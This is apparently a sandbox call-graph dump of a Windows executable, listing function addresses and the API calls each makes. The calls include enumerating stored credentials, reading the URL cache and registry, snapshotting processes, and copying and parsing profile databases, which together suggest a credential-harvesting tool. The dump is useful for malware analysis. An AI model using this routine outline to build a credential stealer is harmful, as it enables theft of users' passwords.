37860->37863 37862 40a9f2 37861->37862 37862->37767 37863->37862 37888 409bca GetModuleFileNameW 37864->37888 37866 40dce6 wcsrchr 37867 40dcf5 37866->37867 37868 40dcf9 wcscat 37866->37868 37867->37868 37868->37774 37889 44db70 37869->37889 37873 40dbfd 37892 4447d9 37873->37892 37876 40dc34 wcscpy wcscpy 37918 40d6f5 37876->37918 37877 40dc1f wcscpy 37877->37876 37880 40d6f5 3 API calls 37881 40dc73 37880->37881 37882 40d6f5 3 API calls 37881->37882 37883 40dc89 37882->37883 37884 40d6f5 3 API calls 37883->37884 37885 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37884->37885 37924 40da80 37885->37924 37888->37866 37890 40dbb4 memset memset 37889->37890 37891 409bca GetModuleFileNameW 37890->37891 37891->37873 37894 4447f4 37892->37894 37893 40dc1b 37893->37876 37893->37877 37894->37893 37895 444807 ??2@YAPAXI 37894->37895 37896 44481f 37895->37896 37897 444873 _snwprintf 37896->37897 37898 4448ab wcscpy 37896->37898 37931 44474a 8 API calls 37897->37931 37900 4448bb 37898->37900 37932 44474a 8 API calls 37900->37932 37901 4448a7 37901->37898 37901->37900 37903 4448cd 37933 44474a 8 API calls 37903->37933 37905 4448e2 37934 44474a 8 API calls 37905->37934 37907 4448f7 37935 44474a 8 API calls 37907->37935 37909 44490c 37936 44474a 8 API calls 37909->37936 37911 444921 37937 44474a 8 API calls 37911->37937 37913 444936 37938 44474a 8 API calls 37913->37938 37915 44494b 37939 44474a 8 API calls 37915->37939 37917 444960 ??3@YAXPAX 37917->37893 37919 44db70 37918->37919 37920 40d702 memset GetPrivateProfileStringW 37919->37920 37921 40d752 37920->37921 37922 40d75c WritePrivateProfileStringW 37920->37922 37921->37922 37923 40d758 37921->37923 37922->37923 37923->37880 37925 44db70 37924->37925 37926 40da8d memset 37925->37926 37927 40daac LoadStringW 37926->37927 37928 40dac6 37927->37928 37928->37927 37930 40dade 37928->37930 37940 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37928->37940 37930->37702 37931->37901 37932->37903 37933->37905 37934->37907 37935->37909 37936->37911 37937->37913 37938->37915 37939->37917 37940->37928 37951 409b98 GetFileAttributesW 37941->37951 37943 40daea 37944 40db63 37943->37944 37945 40daef wcscpy wcscpy GetPrivateProfileIntW 37943->37945 37944->37704 37952 40d65d GetPrivateProfileStringW 37945->37952 37947 40db3e 37953 40d65d GetPrivateProfileStringW 37947->37953 37949 40db4f 37954 40d65d GetPrivateProfileStringW 37949->37954 37951->37943 37952->37947 37953->37949 37954->37944 37990 40eaff 37955->37990 37959 411ae2 memset 37958->37959 37960 411b8f 37958->37960 38030 409bca GetModuleFileNameW 37959->38030 37972 411a8b 37960->37972 37962 411b0a wcsrchr 37963 411b22 wcscat 37962->37963 37964 411b1f 37962->37964 38031 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37963->38031 37964->37963 37966 411b67 38032 402afb 37966->38032 37970 411b7f 38088 40ea13 SendMessageW memset SendMessageW 37970->38088 37973 402afb 27 API calls 37972->37973 37974 411ac0 37973->37974 37975 4110dc 37974->37975 37976 41113e 37975->37976 37981 4110f0 37975->37981 38113 40969c LoadCursorW SetCursor 37976->38113 37978 411143 38114 444a54 37978->38114 38117 4032b4 37978->38117 37979 4110f7 _wcsicmp 37979->37981 37980 411157 37982 40ada2 _wcsicmp 37980->37982 37981->37976 37981->37979 38135 410c46 10 API calls 37981->38135 37985 411167 37982->37985 37983 4111af 37985->37983 37986 4111a6 qsort 37985->37986 37986->37983 37989->37786 37991 40eb10 37990->37991 38003 40e8e0 37991->38003 37994 40eb6c memcpy memcpy 38000 40ebb7 37994->38000 37995 40d134 16 API calls 37995->38000 37996 40ebf2 ??2@YAPAXI ??2@YAPAXI 37997 40ec2e ??2@YAPAXI 37996->37997 38001 40ec65 37996->38001 37997->38001 38000->37994 38000->37995 38000->37996 38001->38001 38013 40ea7f 38001->38013 38002 402f49 38002->37786 38004 40e8f2 38003->38004 38005 40e8eb ??3@YAXPAX 38003->38005 38006 40e900 38004->38006 38007 40e8f9 ??3@YAXPAX 38004->38007 38005->38004 38008 40e911 38006->38008 38009 40e90a ??3@YAXPAX 38006->38009 38007->38006 38010 40e931 ??2@YAPAXI ??2@YAPAXI 38008->38010 38011 40e921 ??3@YAXPAX 38008->38011 38012 40e92a ??3@YAXPAX 38008->38012 38009->38008 38010->37994 38011->38012 38012->38010 38014 40aa04 free 38013->38014 38015 40ea88 38014->38015 38016 40aa04 free 38015->38016 38017 40ea90 38016->38017 38018 40aa04 free 38017->38018 38019 40ea98 38018->38019 38020 40aa04 free 38019->38020 38021 40eaa0 38020->38021 38022 40a9ce 4 API calls 38021->38022 38023 40eab3 38022->38023 38024 40a9ce 4 API calls 38023->38024 38025 40eabd 38024->38025 38026 40a9ce 4 API calls 38025->38026 38027 40eac7 38026->38027 38028 40a9ce 4 API calls 38027->38028 38029 40ead1 38028->38029 38029->38002 38030->37962 38031->37966 38089 40b2cc 38032->38089 38034 402b0a 38035 40b2cc 27 API calls 38034->38035 38036 402b23 38035->38036 38037 40b2cc 27 API calls 38036->38037 38038 402b3a 38037->38038 38039 40b2cc 27 API calls 38038->38039 38040 402b54 38039->38040 38041 40b2cc 27 API calls 38040->38041 38042 402b6b 38041->38042 38043 40b2cc 27 API calls 38042->38043 38044 402b82 38043->38044 38045 40b2cc 27 API calls 38044->38045 38046 402b99 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402bb0 38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402bc7 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402bde 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402bf5 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402c0c 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402c23 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402c3a 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402c51 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402c68 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402c7f 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402c99 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402cb3 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402cd5 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402cf0 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402d0b 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402d26 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402d3e 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402d59 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402d78 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402d93 38085->38086 38087 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38086->38087 38087->37970 38088->37960 38092 40b58d 38089->38092 38091 40b2d1 38091->38034 38093 40b5a4 GetModuleHandleW FindResourceW 38092->38093 38094 40b62e 38092->38094 38095 40b5c2 LoadResource 38093->38095 38097 40b5e7 38093->38097 38094->38091 38096 40b5d0 SizeofResource LockResource 38095->38096 38095->38097 38096->38097 38097->38094 38105 40afcf 38097->38105 38099 40b608 memcpy 38108 40b4d3 memcpy 38099->38108 38101 40b61e 38109 40b3c1 18 API calls 38101->38109 38103 40b626 38110 40b04b 38103->38110 38106 40b04b ??3@YAXPAX 38105->38106 38107 40afd7 ??2@YAPAXI 38106->38107 38107->38099 38108->38101 38109->38103 38111 40b051 ??3@YAXPAX 38110->38111 38112 40b05f 38110->38112 38111->38112 38112->38094 38113->37978 38115 444a64 FreeLibrary 38114->38115 38116 444a83 38114->38116 38115->38116 38116->37980 38118 4032c4 38117->38118 38119 40b633 free 38118->38119 38120 403316 38119->38120 38136 44553b 38120->38136 38124 403480 38334 40368c 15 API calls 38124->38334 38126 403489 38127 40b633 free 38126->38127 38128 403495 38127->38128 38128->37980 38129 4033a9 memset memcpy 38130 4033ec wcscmp 38129->38130 38131 40333c 38129->38131 38130->38131 38131->38124 38131->38129 38131->38130 38332 4028e7 11 API calls 38131->38332 38333 40f508 6 API calls 38131->38333 38133 403421 _wcsicmp 38133->38131 38135->37981 38137 445548 38136->38137 38138 445599 38137->38138 38335 40c768 38137->38335 38139 4455a8 memset 38138->38139 38151 4457f2 38138->38151 38418 403988 38139->38418 38146 4458aa 38148 44594a 38146->38148 38149 4458bb memset memset 38146->38149 38147 445672 38429 403fbe memset memset memset memset memset 38147->38429 38153 4459ed 38148->38153 38154 44595e memset memset 38148->38154 38156 414c2e 17 API calls 38149->38156 38158 445854 38151->38158 38520 403e2d memset memset memset memset memset 38151->38520 38161 445a00 memset memset 38153->38161 38162 445b22 38153->38162 38163 414c2e 17 API calls 38154->38163 38155 4455e5 38155->38147 38166 44560f 38155->38166 38164 4458f9 38156->38164 38157 44557a 38159 44558c 38157->38159 38616 4136c0 CoTaskMemFree 38157->38616 38158->38146 38543 403c9c memset memset memset memset memset 38158->38543 38402 444b06 38159->38402 38566 414c2e 38161->38566 38169 445bca 38162->38169 38170 445b38 memset memset memset 38162->38170 38174 44599c 38163->38174 38165 40b2cc 27 API calls 38164->38165 38175 445909 38165->38175 38177 4087b3 344 API calls 38166->38177 38168 445849 38632 40b1ab free free 38168->38632 38176 445c8b memset memset 38169->38176 38233 445cf0 38169->38233 38180 445bd4 38170->38180 38181 445b98 38170->38181 38184 40b2cc 27 API calls 38174->38184 38193 409d1f 6 API calls 38175->38193 38185 414c2e 17 API calls 38176->38185 38194 445621 38177->38194 38178 445585 38617 41366b FreeLibrary 38178->38617 38179 44589f 38633 40b1ab free free 38179->38633 38191 414c2e 17 API calls 38180->38191 38181->38180 38187 445ba2 38181->38187 38196 4459ac 38184->38196 38197 445cc9 38185->38197 38705 4099c6 wcslen 38187->38705 38188 4456b2 38620 40b1ab free free 38188->38620 38190 40b2cc 27 API calls 38200 445a4f 38190->38200 38202 445be2 38191->38202 38192 403335 38331 4452e5 45 API calls 38192->38331 38205 445919 38193->38205 38618 4454bf 20 API calls 38194->38618 38195 445823 38195->38168 38214 4087b3 344 API calls 38195->38214 38206 409d1f 6 API calls 38196->38206 38208 409d1f 6 API calls 38197->38208 38198 445879 38198->38179 38218 4087b3 344 API calls 38198->38218 38582 409d1f wcslen wcslen 38200->38582 38212 40b2cc 27 API calls 38202->38212 38203 445d3d 38231 40b2cc 27 API calls 38203->38231 38204 445d88 memset memset memset 38215 414c2e 17 API calls 38204->38215 38634 409b98 GetFileAttributesW 38205->38634 38207 4459bc 38206->38207 38701 409b98 GetFileAttributesW 38207->38701 38217 445ce1 38208->38217 38209 445bb3 38708 445403 memset 38209->38708 38210 445680 38210->38188 38452 4087b3 memset 38210->38452 38221 445bf3 38212->38221 38214->38195 38224 445dde 38215->38224 38725 409b98 GetFileAttributesW 38217->38725 38218->38198 38230 409d1f 6 API calls 38221->38230 38222 445928 38222->38148 38635 40b6ef 38222->38635 38232 40b2cc 27 API calls 38224->38232 38225 4459cb 38225->38153 38242 40b6ef 259 API calls 38225->38242 38229 40b2cc 27 API calls 38235 445a94 38229->38235 38237 445c07 38230->38237 38238 445d54 _wcsicmp 38231->38238 38241 445def 38232->38241 38233->38192 38233->38203 38233->38204 38234 445389 265 API calls 38234->38169 38587 40ae18 38235->38587 38236 44566d 38236->38151 38503 413d4c 38236->38503 38245 445389 265 API calls 38237->38245 38246 445d71 38238->38246 38308 445d67 38238->38308 38240 445665 38619 40b1ab free free 38240->38619 38247 409d1f 6 API calls 38241->38247 38242->38153 38250 445c17 38245->38250 38726 445093 23 API calls 38246->38726 38253 445e03 38247->38253 38249 4456d8 38255 40b2cc 27 API calls 38249->38255 38256 40b2cc 27 API calls 38250->38256 38252 44563c 38252->38240 38258 4087b3 344 API calls 38252->38258 38727 409b98 GetFileAttributesW 38253->38727 38254 40b6ef 259 API calls 38254->38192 38261 4456e2 38255->38261 38262 445c23 38256->38262 38257 445d83 38257->38192 38258->38252 38260 445e12 38266 445e6b 38260->38266 38270 40b2cc 27 API calls 38260->38270 38621 413fa6 _wcsicmp _wcsicmp 38261->38621 38265 409d1f 6 API calls 38262->38265 38268 445c37 38265->38268 38729 445093 23 API calls 38266->38729 38267 4456eb 38273 4456fd memset memset memset memset 38267->38273 38274 4457ea 38267->38274 38275 445389 265 API calls 38268->38275 38269 445b17 38702 40aebe 38269->38702 38277 445e33 38270->38277 38622 409c70 wcscpy wcsrchr 38273->38622 38625 413d29 38274->38625 38281 445c47 38275->38281 38282 409d1f 6 API calls 38277->38282 38279 445e7e 38283 445f67 38279->38283 38286 40b2cc 27 API calls 38281->38286 38287 445e47 38282->38287 38288 40b2cc 27 API calls 38283->38288 38284 445ab2 memset 38289 40b2cc 27 API calls 38284->38289 38291 445c53 38286->38291 38728 409b98 GetFileAttributesW 38287->38728 38293 445f73 38288->38293 38294 445aa1 38289->38294 38290 409c70 2 API calls 38295 44577e 38290->38295 38296 409d1f 6 API calls 38291->38296 38298 409d1f 6 API calls 38293->38298 38294->38269 38294->38284 38299 409d1f 6 API calls 38294->38299 38594 40add4 38294->38594 38599 445389 38294->38599 38608 40ae51 38294->38608 38300 409c70 2 API calls 38295->38300 38301 445c67 38296->38301 38297 445e56 38297->38266 38305 445e83 memset 38297->38305 38302 445f87 38298->38302 38299->38294 38303 44578d 38300->38303 38304 445389 265 API calls 38301->38304 38732 409b98 GetFileAttributesW 38302->38732 38303->38274 38310 40b2cc 27 API calls 38303->38310 38304->38169 38309 40b2cc 27 API calls 38305->38309 38308->38192 38308->38254 38312 445eab 38309->38312 38311 4457a8 38310->38311 38313 409d1f 6 API calls 38311->38313 38314 409d1f 6 API calls 38312->38314 38315 4457b8 38313->38315 38316 445ebf 38314->38316 38624 409b98 GetFileAttributesW 38315->38624 38318 40ae18 9 API calls 38316->38318 38327 445ef5 38318->38327 38319 4457c7 38319->38274 38321 4087b3 344 API calls 38319->38321 38320 40ae51 9 API calls 38320->38327 38321->38274 38322 445f5c 38323 40aebe FindClose 38322->38323 38323->38283 38324 40add4 2 API calls 38324->38327 38325 40b2cc 27 API calls 38325->38327 38326 409d1f 6 API calls 38326->38327 38327->38320 38327->38322 38327->38324 38327->38325 38327->38326 38329 445f3a 38327->38329 38730 409b98 GetFileAttributesW 38327->38730 38731 445093 23 API calls 38329->38731 38331->38131 38332->38133 38333->38131 38334->38126 38336 40c775 38335->38336 38733 40b1ab free free 38336->38733 38338 40c788 38734 40b1ab free free 38338->38734 38340 40c790 38735 40b1ab free free 38340->38735 38342 40c798 38343 40aa04 free 38342->38343 38344 40c7a0 38343->38344 38736 40c274 memset 38344->38736 38349 40a8ab 9 API calls 38350 40c7c3 38349->38350 38351 40a8ab 9 API calls 38350->38351 38352 40c7d0 38351->38352 38765 40c3c3 38352->38765 38356 40c877 38365 40bdb0 38356->38365 38357 40c86c 38807 4053fe 39 API calls 38357->38807 38363 40c7e5 38363->38356 38363->38357 38364 40c634 50 API calls 38363->38364 38790 40a706 38363->38790 38364->38363 39070 404363 38365->39070 38367 40bf5d 39090 40440c 38367->39090 38370 40bdee 38370->38367 38373 40b2cc 27 API calls 38370->38373 38371 40bddf CredEnumerateW 38371->38370 38374 40be02 wcslen 38373->38374 38374->38367 38382 40be1e 38374->38382 38375 40be26 wcsncmp 38375->38382 38378 40be7d memset 38379 40bea7 memcpy 38378->38379 38378->38382 38380 40bf11 wcschr 38379->38380 38379->38382 38380->38382 38381 40b2cc 27 API calls 38383 40bef6 _wcsnicmp 38381->38383 38382->38367 38382->38375 38382->38378 38382->38379 38382->38380 38382->38381 38384 40bf43 LocalFree 38382->38384 39093 40bd5d 28 API calls 38382->39093 39094 404423 38382->39094 38383->38380 38383->38382 38384->38382 38385 4135f7 39109 4135e0 38385->39109 38388 40b2cc 27 API calls 38389 41360d 38388->38389 38390 40a804 8 API calls 38389->38390 38391 413613 38390->38391 38392 41361b 38391->38392 38393 41363e 38391->38393 38394 40b273 27 API calls 38392->38394 38395 4135e0 FreeLibrary 38393->38395 38396 413625 GetProcAddress 38394->38396 38397 413643 38395->38397 38396->38393 38398 413648 38396->38398 38397->38157 38399 413658 38398->38399 38400 4135e0 FreeLibrary 38398->38400 38399->38157 38401 413666 38400->38401 38401->38157 39112 4449b9 38402->39112 38405 444c1f 38405->38138 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39133 444972 GetVersionExW 38408->39133 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 38416->38411 38416->38412 39134 444aa5 42 API calls 38416->39134 39135 40a7a0 GetVersionExW 38416->39135 39136 444a85 42 API calls 38416->39136 38419 40399d 38418->38419 39138 403a16 38419->39138 38422 403a12 wcsrchr 38422->38155 38425 4039a3 38426 4039f4 38425->38426 38428 403a09 38425->38428 39149 40a02c CreateFileW 38425->39149 38427 4099c6 2 API calls 38426->38427 38426->38428 38427->38428 39152 40b1ab free free 38428->39152 38430 414c2e 17 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 17 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39179 40414f memset 38443->39179 38445 404140 39193 40b1ab free free 38445->39193 38447 4040ec memset 38450 4040e0 38447->38450 38448 404148 38448->38210 38449 4099c6 2 API calls 38449->38450 38450->38445 38450->38447 38450->38449 38451 40a8ab 9 API calls 38450->38451 38451->38450 39206 40a6e6 WideCharToMultiByte 38452->39206 38454 4087ed 39207 4095d9 memset 38454->39207 38457 408953 38457->38210 38458 408809 memset memset memset memset memset 38459 40b2cc 27 API calls 38458->38459 38460 4088a1 38459->38460 38461 409d1f 6 API calls 38460->38461 38462 4088b1 38461->38462 38463 40b2cc 27 API calls 38462->38463 38464 4088c0 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 4088d0 38465->38466 38467 40b2cc 27 API calls 38466->38467 38468 4088df 38467->38468 38504 40b633 free 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 38509 413df3 memset 38507->38509 38512 413eb0 38507->38512 38508->38249 39632 413f27 38509->39632 38511 413ebf free 38511->38512 38512->38506 38512->38511 38513 4099f4 3 API calls 38512->38513 38513->38512 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38517 413e1f 38514->38517 38516->38517 38517->38514 39637 413959 38517->39637 39653 413ca4 38517->39653 38519 413ea2 CloseHandle 38519->38512 38521 414c2e 17 API calls 38520->38521 38522 403eb7 38521->38522 38523 414c2e 17 API calls 38522->38523 38524 403ec5 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 403ee2 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 403efd 38527->38528 38529 409d1f 6 API calls 38528->38529 38530 403f15 38529->38530 38531 403af5 20 API calls 38530->38531 38532 403f29 38531->38532 38533 403af5 20 API calls 38532->38533 38534 403f3a 38533->38534 38535 40414f 33 API calls 38534->38535 38541 403f4f 38535->38541 38536 403faf 39667 40b1ab free free 38536->39667 38538 403f5b memset 38538->38541 38539 403fb7 38539->38195 38540 4099c6 2 API calls 38540->38541 38541->38536 38541->38538 38541->38540 38542 40a8ab 9 API calls 38541->38542 38542->38541 38544 414c2e 17 API calls 38543->38544 38545 403d26 38544->38545 38546 414c2e 17 API calls 38545->38546 38547 403d34 38546->38547 38548 409d1f 6 API calls 38547->38548 38549 403d51 38548->38549 38550 409d1f 6 API calls 38549->38550 38551 403d6c 38550->38551 38552 409d1f 6 API calls 38551->38552 38553 403d84 38552->38553 38554 403af5 20 API calls 38553->38554 38555 403d98 38554->38555 38556 403af5 20 API calls 38555->38556 38557 403da9 38556->38557 38558 40414f 33 API calls 38557->38558 38564 403dbe 38558->38564 38559 403e1e 39668 40b1ab free free 38559->39668 38561 403dca memset 38561->38564 38562 403e26 38562->38198 38563 4099c6 2 API calls 38563->38564 38564->38559 38564->38561 38564->38563 38565 40a8ab 9 API calls 38564->38565 38565->38564 38567 414b81 9 API calls 38566->38567 38568 414c40 38567->38568 38569 414c73 memset 38568->38569 39669 409cea 38568->39669 38571 414c94 38569->38571 39672 414592 RegOpenKeyExW 38571->39672 38574 414c64 SHGetSpecialFolderPathW 38576 414d0b 38574->38576 38575 414cc1 38577 414cf4 wcscpy 38575->38577 39673 414bb0 wcscpy 38575->39673 38576->38190 38577->38576 38579 414cd2 39674 4145ac RegQueryValueExW 38579->39674 38581 414ce9 RegCloseKey 38581->38577 38583 409d62 38582->38583 38584 409d43 wcscpy 38582->38584 38583->38229 38585 409719 2 API calls 38584->38585 38586 409d51 wcscat 38585->38586 38586->38583 38588 40aebe FindClose 38587->38588 38589 40ae21 38588->38589 38590 4099c6 2 API calls 38589->38590 38591 40ae35 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 40ae49 38592->38593 38593->38294 38595 40ade0 38594->38595 38596 40ae0f 38594->38596 38595->38596 38597 40ade7 wcscmp 38595->38597 38596->38294 38597->38596 38598 40adfe wcscmp 38597->38598 38598->38596 38600 40ae18 9 API calls 38599->38600 38602 4453c4 38600->38602 38601 40ae51 9 API calls 38601->38602 38602->38601 38603 4453f3 38602->38603 38604 40add4 2 API calls 38602->38604 38607 445403 260 API calls 38602->38607 38605 40aebe FindClose 38603->38605 38604->38602 38606 4453fe 38605->38606 38606->38294 38607->38602 38609 40ae7b FindNextFileW 38608->38609 38610 40ae5c FindFirstFileW 38608->38610 38611 40ae94 38609->38611 38612 40ae8f 38609->38612 38610->38611 38614 409d1f 6 API calls 38611->38614 38615 40aeb6 38611->38615 38613 40aebe FindClose 38612->38613 38613->38611 38614->38615 38615->38294 38616->38178 38617->38159 38618->38252 38619->38236 38620->38236 38621->38267 38623 409c89 38622->38623 38623->38290 38624->38319 38626 413d39 38625->38626 38627 413d2f FreeLibrary 38625->38627 38628 40b633 free 38626->38628 38627->38626 38629 413d42 38628->38629 38630 40b633 free 38629->38630 38631 413d4a 38630->38631 38631->38151 38632->38158 38633->38146 38634->38222 38636 44db70 38635->38636 38637 40b6fc memset 38636->38637 38638 409c70 2 API calls 38637->38638 38639 40b732 wcsrchr 38638->38639 38640 40b743 38639->38640 38641 40b746 memset 38639->38641 38640->38641 38642 40b2cc 27 API calls 38641->38642 38643 40b76f 38642->38643 38644 409d1f 6 API calls 38643->38644 38645 40b783 38644->38645 39675 409b98 GetFileAttributesW 38645->39675 38647 40b792 38648 40b7c2 38647->38648 38649 409c70 2 API calls 38647->38649 39676 40bb98 38648->39676 38651 40b7a5 38649->38651 38655 40b2cc 27 API calls 38651->38655 38653 40b837 CloseHandle 38657 40b83e memset 38653->38657 38654 40b817 38656 409a45 3 API calls 38654->38656 38658 40b7b2 38655->38658 38659 40b827 CopyFileW 38656->38659 39709 40a6e6 WideCharToMultiByte 38657->39709 38661 409d1f 6 API calls 38658->38661 38659->38657 38661->38648 38662 40b866 38663 444432 121 API calls 38662->38663 38664 40b879 38663->38664 38665 40bad5 38664->38665 38666 40b273 27 API calls 38664->38666 38667 40baeb 38665->38667 38668 40bade DeleteFileW 38665->38668 38669 40b89a 38666->38669 38670 40b04b ??3@YAXPAX 38667->38670 38668->38667 38672 438552 140 API calls 38669->38672 38671 40baf3 38670->38671 38671->38148 38673 40b8a4 38672->38673 38674 40bacd 38673->38674 38676 4251c4 143 API calls 38673->38676 38675 443d90 111 API calls 38674->38675 38675->38665 38698 40b8b8 38676->38698 38677 40bac6 39719 424f26 123 API calls 38677->39719 38678 40b8bd memset 39710 425413 17 API calls 38678->39710 38681 425413 17 API calls 38681->38698 38684 40a71b MultiByteToWideChar 38684->38698 38687 40b9b5 memcmp 38687->38698 38688 4099c6 2 API calls 38688->38698 38689 404423 38 API calls 38689->38698 38692 4251c4 143 API calls 38692->38698 38693 40bb3e memset memcpy 39720 40a734 MultiByteToWideChar 38693->39720 38695 40bb88 LocalFree 38695->38698 38698->38677 38698->38678 38698->38681 38698->38684 38698->38687 38698->38688 38698->38689 38698->38692 38698->38693 38699 40ba5f memcmp 38698->38699 38700 40a734 MultiByteToWideChar 38698->38700 39711 4253ef 16 API calls 38698->39711 39712 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38698->39712 39713 4253af 17 API calls 38698->39713 39714 4253cf 17 API calls 38698->39714 39715 447280 memset 38698->39715 39716 447960 memset memcpy memcpy memcpy 38698->39716 39717 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38698->39717 39718 447920 memcpy memcpy memcpy 38698->39718 38699->38698 38700->38698 38701->38225 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38162 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38209 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39804 409b98 GetFileAttributesW 38712->39804 38714 44545e 38715 445476 38714->38715 38716 40b6ef 259 API calls 38714->38716 38717 40b2cc 27 API calls 38715->38717 38716->38715 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39805 409b98 GetFileAttributesW 38720->39805 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 259 API calls 38722->38724 38723->38234 38724->38723 38725->38233 38726->38257 38727->38260 38728->38297 38729->38279 38730->38327 38731->38327 38732->38308 38733->38338 38734->38340 38735->38342 38737 414c2e 17 API calls 38736->38737 38738 40c2ae 38737->38738 38808 40c1d3 38738->38808 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38752 40a8ab 9 API calls 38749->38752 38750->38747 38751 40c373 GetLastError 38750->38751 38753 40c3ad FindCloseUrlCache 38751->38753 38754 40c37e 38751->38754 38755 40c33e wcschr 38752->38755 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38997 40a97a 38760->38997 38763 40a8cc 38763->38349 38764 40a8d0 7 API calls 38764->38763 39002 40b1ab free free 38765->39002 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 39003 414592 RegOpenKeyExW 38769->39003 38771 40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 39004 40aa1d 38775->39004 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 39006 405220 38787->39006 38791 4099c6 2 API calls 38790->38791 38792 40a714 _wcslwr 38791->38792 38793 40c634 38792->38793 39063 405361 38793->39063 38796 40c65c wcslen 39066 4053b6 39 API calls 38796->39066 38797 40c71d wcslen 38797->38363 38799 40c713 39069 4053df 39 API calls 38799->39069 38800 40c677 38800->38799 39067 40538b 39 API calls 38800->39067 38803 40c6a5 38803->38799 38804 40c6a9 memset 38803->38804 38805 40c6d3 38804->38805 39068 40c589 44 API calls 38805->39068 38807->38356 38809 40ae18 9 API calls 38808->38809 38815 40c210 38809->38815 38810 40ae51 9 API calls 38810->38815 38811 40c264 38812 40aebe FindClose 38811->38812 38814 40c26f 38812->38814 38813 40add4 2 API calls 38813->38815 38820 40e5ed memset memset 38814->38820 38815->38810 38815->38811 38815->38813 38816 40c231 _wcsicmp 38815->38816 38817 40c1d3 35 API calls 38815->38817 38816->38815 38818 40c248 38816->38818 38817->38815 38833 40c084 22 API calls 38818->38833 38821 414c2e 17 API calls 38820->38821 38822 40e63f 38821->38822 38823 409d1f 6 API calls 38822->38823 38824 40e658 38823->38824 38834 409b98 GetFileAttributesW 38824->38834 38826 40e680 38835 409b98 GetFileAttributesW 38826->38835 38827 40e667 38827->38826 38829 409d1f 6 API calls 38827->38829 38829->38826 38830 40e68f 38831 40c2d8 38830->38831 38836 40e4b2 38830->38836 38831->38743 38831->38744 38833->38815 38834->38827 38835->38830 38857 40e01e 38836->38857 38838 40e593 38839 40e5b0 38838->38839 38840 40e59c DeleteFileW 38838->38840 38841 40b04b ??3@YAXPAX 38839->38841 38840->38839 38843 40e5bb 38841->38843 38842 40e521 38842->38838 38880 40e175 38842->38880 38845 40e5c4 CloseHandle 38843->38845 38846 40e5cc 38843->38846 38845->38846 38848 40b633 free 38846->38848 38847 40e573 38850 40e584 38847->38850 38851 40e57c CloseHandle 38847->38851 38849 40e5db 38848->38849 38854 40b633 free 38849->38854 38923 40b1ab free free 38850->38923 38851->38850 38853 40e540 38853->38847 38900 40e2ab 38853->38900 38855 40e5e3 38854->38855 38855->38831 38924 406214 38857->38924 38860 40e16b 38860->38842 38863 40afcf 2 API calls 38864 40e08d OpenProcess 38863->38864 38865 40e0a4 